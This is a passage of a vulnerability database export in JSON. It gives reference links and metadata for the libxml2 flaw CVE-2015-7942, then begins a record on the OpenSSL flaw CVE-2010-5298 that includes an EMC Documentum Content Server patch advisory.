"HT206169", "trust": 0.8, "url": "https://support.apple.com/ja-jp/ht206169" }, { "title": "Bug 744980", "trust": 0.8, "url": "https://bugzilla.gnome.org/show_bug.cgi?id=744980" }, { "title": "Bug 756456", "trust": 0.8, "url": "https://bugzilla.gnome.org/show_bug.cgi?id=756456" }, { "title": "Another variation of overflow in Conditional sections", "trust": 0.8, "url": "https://git.gnome.org/browse/libxml2/commit/?id=bd0526e66a56e75a18da8c15c4750db8f801c52d" }, { "title": "RHSA-2015:2550", "trust": 0.8, "url": "https://rhn.redhat.com/errata/rhsa-2015-2550.html" }, { "title": "RHSA-2015:2549", "trust": 0.8, "url": "https://rhn.redhat.com/errata/rhsa-2015-2549.html" }, { "title": "TLSA-2016-3", "trust": 0.8, "url": "http://www.turbolinux.co.jp/security/2016/tlsa-2016-3j.html" }, { "title": "USN-2812-1", "trust": 0.8, "url": "http://www.ubuntu.com/usn/usn-2812-1/" }, { "title": "Top Page", "trust": 0.8, "url": "http://xmlsoft.org/index.html" }, { "title": "v2.9.3: Nov 20 2015", "trust": 0.8, "url": "http://xmlsoft.org/news.html" }, { "title": "Libxml2 Remediation measures for denial of service vulnerabilities", "trust": 0.6, "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=58780" }, { "title": "Red Hat: Moderate: libxml2 security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20152549 - security advisory" }, { "title": "Red Hat: Moderate: libxml2 security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20152550 - security advisory" }, { "title": "Ubuntu Security Notice: libxml2 vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2812-1" }, { "title": "Red Hat: CVE-2015-7942", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2015-7942" }, { "title": "Apple: tvOS 9.2", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=apple_security_advisories\u0026qid=ce338ecd7a3c82e55bcf20e44e532eea" }, { "title": "Debian CVElist Bug Report Logs: CVE-2015-8035: DoS with XZ compression support loop", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=a019ec3e62995ba6fccfa99991a69e8e" }, { "title": "Debian CVElist Bug Report Logs: libxml2: CVE-2015-8241: Buffer overread with XML parser in xmlNextChar", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=922e5d3f7941ba5ce004a1df5d62804d" }, { "title": "Debian CVElist Bug Report Logs: libxml2: CVE-2015-7942: heap-buffer-overflow in xmlParseConditionalSections", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=b43558695a2829b2e8d380a917f49836" }, { "title": "Debian CVElist Bug Report Logs: libxml2: CVE-2015-1819: denial of service processing a crafted XML document", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=d4df89c444b497f8334824cafc13f268" }, { "title": "Apple: watchOS 2.2", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=apple_security_advisories\u0026qid=0cbe3084baf2e465ecd2cc68ad686a9a" }, { "title": "Debian Security Advisories: DSA-3430-1 libxml2 -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=b5464377ed0e849a889195e29c21e27c" }, { "title": "Debian CVElist Bug Report Logs: libxml2: out-of-bounds read", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=7cf75e4a67dc759cf112b117265731c9" }, { "title": "Debian CVElist Bug Report Logs: libxml2: parsing an unclosed comment can result in `Conditional jump or move depends on uninitialised value(s)` and unsafe memory access", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=2e6915a419592c0eb35235af4b02c926" }, { "title": "Apple: iOS 9.3", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=apple_security_advisories\u0026qid=3ae8bd7fcbbf51e9c7fe356687ecd0cf" }, { "title": "Amazon Linux AMI: ALAS-2015-628", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2015-628" }, { "title": "Apple: OS X El Capitan v10.11.4 and Security Update 2016-002", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=apple_security_advisories\u0026qid=ef054ba76412200e34091eb91c38c281" }, { "title": "Amazon Linux 2: ALAS2-2019-1220", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2-2019-1220" }, { "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - October 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=435ed9abc2fb1e74ce2a69605a01e326" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - January 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=eb439566c9130adc92d21bc093204cf8" } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-7942" }, { "db": "JVNDB", "id": "JVNDB-2015-005979" }, { "db": "CNNVD", "id": "CNNVD-201511-296" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-119", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-85903" }, { "db": "JVNDB", "id": "JVNDB-2015-005979" }, { "db": "NVD", "id": "CVE-2015-7942" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.1, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2015-2719645.html" }, { "trust": 2.1, "url": "https://bugzilla.gnome.org/show_bug.cgi?id=756456" }, { "trust": 1.9, "url": "http://www.securityfocus.com/bid/79507" }, { "trust": 1.9, "url": "https://security.gentoo.org/glsa/201701-37" }, { "trust": 1.9, "url": "http://rhn.redhat.com/errata/rhsa-2015-2550.html" }, { "trust": 1.9, "url": "http://rhn.redhat.com/errata/rhsa-2016-1089.html" }, { "trust": 1.8, "url": "http://lists.apple.com/archives/security-announce/2016/mar/msg00000.html" }, { "trust": 1.8, "url": "http://lists.apple.com/archives/security-announce/2016/mar/msg00001.html" }, { "trust": 1.8, "url": "http://lists.apple.com/archives/security-announce/2016/mar/msg00002.html" }, { "trust": 1.8, "url": "http://lists.apple.com/archives/security-announce/2016/mar/msg00004.html" }, { "trust": 1.8, "url": "http://www.oracle.com/technetwork/topics/security/bulletinapr2016-2952098.html" }, { "trust": 1.8, "url": "http://xmlsoft.org/news.html" }, { "trust": 1.8, "url": "https://bugzilla.gnome.org/show_bug.cgi?id=744980#c8" }, { "trust": 1.8, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04944172" }, { "trust": 1.8, "url": "https://support.apple.com/ht206166" }, { "trust": 1.8, "url": "https://support.apple.com/ht206167" }, { "trust": 1.8, "url": "https://support.apple.com/ht206168" }, { "trust": 1.8, "url": "https://support.apple.com/ht206169" }, { "trust": 1.8, "url": "http://www.debian.org/security/2015/dsa-3430" }, { "trust": 1.8, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-february/177341.html" }, { "trust": 1.8, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-february/177381.html" }, { "trust": 1.8, "url": "http://www.openwall.com/lists/oss-security/2015/10/22/5" }, { "trust": 1.8, "url": "http://www.openwall.com/lists/oss-security/2015/10/22/8" }, { "trust": 1.8, "url": "http://rhn.redhat.com/errata/rhsa-2015-2549.html" }, { "trust": 1.8, "url": "http://www.securitytracker.com/id/1034243" }, { "trust": 1.8, "url": "http://lists.opensuse.org/opensuse-updates/2015-12/msg00120.html" }, { "trust": 1.8, "url": "http://lists.opensuse.org/opensuse-updates/2016-01/msg00031.html" }, { "trust": 1.8, "url": "http://www.ubuntu.com/usn/usn-2812-1" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=145382616617563\u0026w=2" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7942" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu97668313/index.html" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-7942" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7499" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5312" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7942" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7500" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8242" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2023.3732" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8035" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7498" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7941" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7497" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1819" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8241" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8317" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2015-7942" }, { "trust": 0.3, "url": "http://seclists.org/oss-sec/2015/q4/127" }, { "trust": 0.3, "url": "http://www.pcre.org/" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04944172" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023350" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023873" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023983" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21972720" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21975225" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21975975" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21979767" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21982607" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21985337" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/libxml2_advisory2.asc" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-7941" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-8241" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-5312" }, { "trust": 0.2, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.2, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-7500" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-7499" }, { "trust": 0.2, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.2, "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-7497" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-8242" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-8317" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-7498" }, { "trust": 0.2, "url": "https://support.apple.com/kb/ht201222" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8659" }, { "trust": 0.2, "url": "https://gpgtools.org" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0801" }, { "trust": 0.2, "url": "https://www.apple.com/support/security/pgp/" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1734" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1740" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0802" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=145382616617563\u0026amp;w=2" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/119.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://access.redhat.com/errata/rhsa-2015:2549" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/2812-1/" }, { "trust": 0.1, "url": "https://issues.jboss.org/):" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0763" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_web_server/3/html-single/3.0.3_release_notes/index.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0706" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5345" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0714" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0209" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5346" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0714" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-0209" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8710" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5351" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0706" }, { "trust": 0.1, "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=webserver\u0026version=3.0.3" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-8035" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-8710" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-5346" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-5351" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-5345" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0763" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_n" }, { "trust": 0.1, "url": "http://www.hpe.com/support/security_bulletin_archive" }, { "trust": 0.1, "url": "http://www.hpe.com/support/subscriber_choice" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-5131" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-3705" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1840" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4483" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-3705" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1836" }, { "trust": 0.1, "url": "https://security.gentoo.org/" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1838" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-3627" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4483" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7942" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1839" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2073" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7499" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1836" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1839" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8806" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2073" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-8806" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-3627" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-8035" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-5131" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-5312" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7498" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7500" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1838" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7941" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-1819" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4658" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-8242" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4658" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1840" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7497" }, { "trust": 0.1, "url": "https://www.debian.org/security/faq" }, { "trust": 0.1, "url": "https://www.debian.org/security/" }, { "trust": 0.1, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-1819" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1751" }, { "trust": 0.1, "url": "https://www.apple.com/itunes/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1755" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1756" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1753" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1757" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1760" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1750" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1766" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1761" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1758" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1752" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1763" }, { "trust": 0.1, "url": "http://www.tencent.com)" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1762" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1775" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1754" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1748" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7551" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0777" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8472" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3195" }, { "trust": 0.1, "url": "http://www.apple.com/support/downloads/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8126" }, { "trust": 0.1, "url": "https://support.apple.com/kb/ht206171" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1732" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9495" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5334" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1733" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1736" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1735" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0778" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5333" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1738" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1737" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0973" } ], "sources": [ { "db": "VULHUB", "id": "VHN-85903" }, { "db": "VULMON", "id": "CVE-2015-7942" }, { "db": "BID", "id": "79507" }, { "db": "JVNDB", "id": "JVNDB-2015-005979" }, { "db": "PACKETSTORM", "id": "137101" }, { "db": "PACKETSTORM", "id": "135395" }, { "db": "PACKETSTORM", "id": "140533" }, { "db": "PACKETSTORM", "id": "135045" }, { "db": "PACKETSTORM", "id": "134655" }, { "db": "PACKETSTORM", "id": "136342" }, { "db": "PACKETSTORM", "id": "136346" }, { "db": "CNNVD", "id": "CNNVD-201511-296" }, { "db": "NVD", "id": "CVE-2015-7942" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULHUB", "id": "VHN-85903" }, { "db": "VULMON", "id": "CVE-2015-7942" }, { "db": "BID", "id": "79507" }, { "db": "JVNDB", "id": "JVNDB-2015-005979" }, { "db": "PACKETSTORM", "id": "137101" }, { "db": "PACKETSTORM", "id": "135395" }, { "db": "PACKETSTORM", "id": "140533" }, { "db": "PACKETSTORM", "id": "135045" }, { "db": "PACKETSTORM", "id": "134655" }, { "db": "PACKETSTORM", "id": "136342" }, { "db": "PACKETSTORM", "id": "136346" }, { "db": "CNNVD", "id": "CNNVD-201511-296" }, { "db": "NVD", "id": "CVE-2015-7942" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2015-11-18T00:00:00", "db": "VULHUB", "id": "VHN-85903" }, { "date": "2015-11-18T00:00:00", "db": "VULMON", "id": "CVE-2015-7942" }, { "date": "2015-10-22T00:00:00", "db": "BID", "id": "79507" }, { "date": "2015-11-20T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-005979" }, { "date": "2016-05-17T23:47:44", "db": "PACKETSTORM", "id": "137101" }, { "date": "2016-01-26T17:27:00", "db": "PACKETSTORM", "id": "135395" }, { "date": "2017-01-17T02:26:10", "db": "PACKETSTORM", "id": "140533" }, { "date": "2015-12-24T17:31:30", "db": "PACKETSTORM", "id": "135045" }, { "date": "2015-12-07T16:37:21", "db": "PACKETSTORM", "id": "134655" }, { "date": "2016-03-22T15:05:15", "db": "PACKETSTORM", "id": "136342" }, { "date": "2016-03-22T15:18:02", "db": "PACKETSTORM", "id": "136346" }, { "date": "2015-11-19T00:00:00", "db": "CNNVD", "id": "CNNVD-201511-296" }, { "date": "2015-11-18T16:59:06.540000", "db": "NVD", "id": "CVE-2015-7942" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2019-03-08T00:00:00", "db": "VULHUB", "id": "VHN-85903" }, { "date": "2019-03-08T00:00:00", "db": "VULMON", "id": "CVE-2015-7942" }, { "date": "2016-07-22T20:00:00", "db": "BID", "id": "79507" }, { "date": "2016-03-29T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-005979" }, { "date": "2023-06-30T00:00:00", "db": "CNNVD", "id": "CNNVD-201511-296" }, { "date": "2019-03-08T16:06:36.980000", "db": "NVD", "id": "CVE-2015-7942" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "135045" }, { "db": "PACKETSTORM", "id": "134655" }, { "db": "CNNVD", "id": "CNNVD-201511-296" } ], "trust": 0.8 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "libxml2 of parser.c Inside xmlParseConditionalSections Service disruption in functions (DoS) Vulnerabilities", "sources": [ { "db": "JVNDB", "id": "JVNDB-2015-005979" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "buffer error", "sources": [ { "db": "CNNVD", "id": "CNNVD-201511-296" } ], "trust": 0.6 } }
var-201404-0008
Vulnerability from variot
Race condition in the ssl3_read_bytes function in s3_pkt.c in OpenSSL through 1.0.1g, when SSL_MODE_RELEASE_BUFFERS is enabled, allows remote attackers to inject data across sessions or cause a denial of service (use-after-free and parsing error) via an SSL connection in a multithreaded environment. OpenSSL is prone to a remote memory-corruption vulnerability. An attacker can exploit this issue to cause denial-of-service condition. Due to the nature of this issue, arbitrary code execution may be possible; however, this has not been confirmed. As long as all other products which SMH V7.3.3.1 for Linux x86 communicates with have been upgraded to the latest versions, it will not be vulnerable to the exploits described in CVE-2014-0224. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
ESA-2014-079: EMC Documentum Content Server Multiple Vulnerabilities
EMC Identifier: ESA-2014-079
CVE Identifier: See below for individual CVEs
Severity Rating: CVSS v2 Base Score: See below for individual CVSS score for each CVE
Affected products:
\x95 All EMC Documentum Content Server versions of 7.1 prior to P07
\x95 All EMC Documentum Content Server versions of 7.0
\x95 All EMC Documentum Content Server versions of 6.7 SP2 prior to P16
\x95 All EMC Documentum Content Server versions of 6.7 SP1
\x95 All EMC Documentum Content Server versions prior to 6.7 SP1
Summary:
EMC Documentum Content Server contains fixes for multiple vulnerabilities which also include vulnerabilities disclosed by the OpenSSL project on June 5, 2014 in OpenSSL.
Details: EMC Documentum Content Server may be susceptible to the following vulnerabilities:
\x95 Arbitrary Code Execution (CVE-2014-4618): Authenticated non-privileged users can potentially execute Documentum methods with higher level privileges (up to and including superuser privileges) due to improper authorization checks being performed on user-created system objects. CVSS v2 Base Score: 8.2 (AV:N/AC:M/Au:S/C:C/I:C/A:P)
\x95 DQL Injection (CVE-2014-2520): Certain DQL hints in EMC Documentum Content Server may be potentially exploited by an authenticated non-privileged malicious user to conduct DQL injection attacks and read the database contents. CVSS v2 Base Score: 6.3 (AV:N/AC:M/Au:S/C:C/I:N/A:N)
\x95 Information Disclosure (CVE-2014-2521): Authenticated non-privileged users are allowed to retrieve meta-data of unauthorized system objects due to improper authorization checks being performed on certain RPC commands in Content Server. CVSS v2 Base Score: 6.3 (AV:N/AC:M/Au:S/C:C/I:N/A:N)
\x95 Multiple OpenSSL vulnerabilities (See individual CVEs below and refer to NVD for each of their scores): SSL/TLS Man-in-the-middle (MITM) vulnerability (CVE-2014-0224) DTLS recursion flaw (CVE-2014-0221) DTLS invalid fragment vulnerability (CVE-2014-0195) SSL_MODE_RELEASE_BUFFERS NULL pointer deference (CVE-2014-0198) SSL_MODE_RELEASE_BUFFERS session injection or denial of service (CVE-2010-5298) Anonymous ECDH denial of service (CVE-2014-3470) FLUSH + RELOAD cache side-channel attack (CVE-2014-0076) For more information about these vulnerabilities, please visit the original OpenSSL advisory https://www.openssl.org/news/secadv_20140605.txt
Resolution: The following versions contain the resolution for these issues: \x95 EMC Documentum Content Server version 7.1 P07 and later \x95 EMC Documentum Content Server version 7.0: Hotfixes are available for Windows & Linux. Contact EMC Support to obtain them. For Solaris and AIX, contact EMC Support to open Hotfix requests. \x95 EMC Documentum Content Server version 6.7 SP2 P16 and later \x95 EMC Documentum Content Server version 6.7 SP1: Hotfixes are available for Windows & Linux. Contact EMC Support to obtain them. For Solaris and AIX, contact EMC Support to open Hotfix requests.
EMC recommends all customers to upgrade to one of the above versions at the earliest opportunity.
Link to remedies: Registered EMC Online Support customers can download patches and software from support.emc.com at: https://support.emc.com/downloads/2732_Documentum-Server
For Hotfix, contact EMC Support.
Read and use the information in this EMC Security Advisory to assist in avoiding any situation that might arise from the problems described herein. If you have any questions regarding this product alert, contact EMC Software Technical Support at 1-877-534-2867.
